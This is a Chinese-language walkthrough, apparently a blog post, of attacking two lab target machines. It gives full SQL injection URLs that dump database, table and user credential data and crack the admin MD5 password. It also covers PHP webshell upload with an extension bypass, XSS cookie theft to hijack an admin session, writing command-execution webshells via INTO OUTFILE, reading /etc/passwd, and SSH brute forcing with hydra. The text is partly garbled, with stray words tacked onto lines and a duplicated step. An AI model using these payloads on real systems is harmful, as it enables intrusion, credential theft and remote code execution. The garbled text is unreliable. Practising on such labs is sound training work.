%3c?php@ eval($_post['post']);?%3e,web 攻击靶机
1、sql注入靶机攻击php
首先搭建虚拟机 用kali扫描下当前网段netdiscover -r 192.168.2.0/24css
发现可疑ip地址192.168.2.129sql
并使用nmap扫描这个ip地址,发现其开放了ftp和http协议数据库
打开该虚拟机提供的网页,发现该网站使用url传参,可能存在sql注入点cookie
在id=1后加一个引号,网页报错 该网站存在sql注入漏洞ssh
使用order by语句试出网站后台数据库表的列数 当order by 5 时网页报错 所以该查询涉及到四列元素xss
使用联合查询 查看网页的显示位,获得显示位就能够显示数据库的名字 photoblog测试
http://192.168.2.129/cat.php?id=-2%20union%20select%201,database%20(),3,4网站
获得数据库名字 能够查询数据库中有那些表http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27url
通常状况下users表对咱们有用
http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27
继续查询users表中列名,有变量名 id,login,password
查看users表中的数据:id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2
http://192.168.2.129/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users
MD5解密后,获得密码P4ssw0rd
登陆到管理员页面
尝试上传文件,<?php eval($_POST['a'])?>
发现nophp
改完后缀名发现,能够绕过,并上传成功
http://192.168.2.129/admin/uploads/123456.pHp
获得目录,菜刀链接
2.xss靶机攻击
nmap 扫描192.168.2.130发现靶机开着80端口和ssh协议
测试
有窗口弹出,证实存在漏洞
在靶机上留言
能够将任意登陆用户的cookie发送到指定ip 在指定 ip 接受 cookie 后能够伪形成登录者
登陆界面:使用密码和用户名进行登陆
获取到的cookie
使用cookie再次进行登陆:发现已经已admin的身份登陆进页面中。
进入管理界面后,发现博客编辑界面存在sql注入漏洞
http://192.168.2.130/admin/edit.php?id=4 union select 1,2,3,4
发现2和3能够显示出来。
http://192.168.2.130/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4
能够读取passwd文件,可是不能读取shadow文件。
咱们尝试能不能建立一个文件。
在编辑页面发现错误提示中有/var/www/classes 目录,
尝试后发现/var/www/css 目录可写。
因而构造语句:
http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
而后打开
http://192.168.2.130/css/s.php
说明s.php文件成功写入到/var/www/css 目录,下面将
写入z.php中,构造url为:
http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
访问z.php,并使用uname -a获取系统信息。能够远程执行命令。
下面写入一句话木马,构造url:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
菜刀连接:
下面写入一句话木马,构造url:
http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
菜刀连接:
发现机器开了ssh,所以用hydra爆破下:
ssh登录
%3c?php@ eval($_post['post']);?%3e,web 攻击靶机相关推荐
- php %3c php 攻击,web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- web攻击(Linux服务器)
CC攻击 1.安装ab命令:yum -y install httpd-tools 2.发起CC攻击:ab -c 200 -n 100000 -H "host:域名" http:// ...
- %3c xml 和php冲突,[原创]WEB安全第五章 漏洞学习与利用11 xml实体注入
WEB安全第五章 漏洞学习与利用11 xml实体注入 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数 ...
- 常见的Web攻击手段,拿捏了!
大家好,我是小菜. 一个希望能够成为 吹着牛X谈架构 的男人!如果你也想成为我想成为的人,不然点个关注做个伴,让小菜不再孤单! 本文主要介绍 互联网中常见的 Web 攻击手段 如有需要,可以参考 如有 ...
- web攻击有哪些方式?小白需要知道的几种攻击方式
Web攻击 在互联网中,攻击手段数不胜数,我们平时不能以自己只是普通的开发程序员而不是安全方向的开发者为理由,而不去掌握基本的 Web 攻击手段!我们来熟悉一下有哪几种常见的 Web 攻击手段 常见的 ...
- 第四章(1.2)机器学习——在web攻击检测中的应用实践
一.背景 通俗地讲,任何一个的机器学习问题都可以等价于一个寻找合适变换函数的问题.例如语音识别,就是在求取合适的变换函数,将输入的一维时序语音信号变换到语义空间:而近来引发全民关注的围棋人工智能Alp ...
- Web攻击检测机器学习深度实践
一.概述 1.1 传统WAF的痛点 传统的WAF,依赖规则和黑白名单的方式来进行Web攻击检测.该方式过分依赖安全人员的知识广度,针对未知攻击类型无可奈何:另一方面即使是已知的攻击类型,由于正则表达式 ...
- 典型Web攻击(网络空间安全实训)
典型****Web攻击 1.实验内容与环境 1.1实验内容 SQL注入.XSS.CSRF.文件上传.目录遍历(SQL注入必做,其它四选一).可以基于如下实验环境,也可以百度"实验楼" ...
最新文章
- linux fcitx启动 窗口,Linux系统Fcitx中文输入法开机启动方法
- ffmpeg text relocations
- 坐拥双妹、佰草集,上海家化是怎样将一只脚留在高端护肤品门外的?
- 根本不值得一提的乒乓球国手王浩
- jodd忽略ssl证书_关于java访问https资源时,忽略证书信任问题
- 小米发布会之文案错误:大哥你先处罚自己!再处罚相关高管!
- Android Studio 开发支付宝小程序
- 中国5级省市编码爬去整理(统计用区划和城乡划分代码)
- re模块或正则表达式
- stm32f4 USB项目开发详解
- 【Android 学习记录】:针对Android 7.0 抓不到HTTPS包的情况
- 离散时间傅里叶变换(一)
- v-for渲染img标签图片
- WEB测试项目实战——2.产品需求与设计评审
- c语言关键字之auto
- Apifox:详细使用教程,带你轻松拿捏
- 体验AI拜年新姿势,爱奇艺技术团队这波操作真秀!
- 《人类简史》笔记三—— 历史从无正义
- Janus源码分析(4)——信令交互过程
- 3dmax导出fbx之后模型变大
热门文章
- C语言程序设计的总结与反思
- STM8L 设置输入模式读取PIN脚高低电平就是个坑
- 【张钹院士 | 大师谈AI】迈向第三代人工智能「AI核心算法」
- linux下迅雷远程下载服务,在 Linux 下使用迅雷的另一种无入侵方式
- Sharding-JDBC(二)- Sharding-JDBC介绍
- 字符串判断相等和不相等
- Ai上色网站,将黑白图片转为彩色图片
- 5步搭建免费图床(CDN图床)再也不用担心网站网速与内存了
- java毕业设计个人博客系统mybatis+源码+调试部署+系统+数据库+lw
- 套用bi模板,轻松搞定各类数据分析报表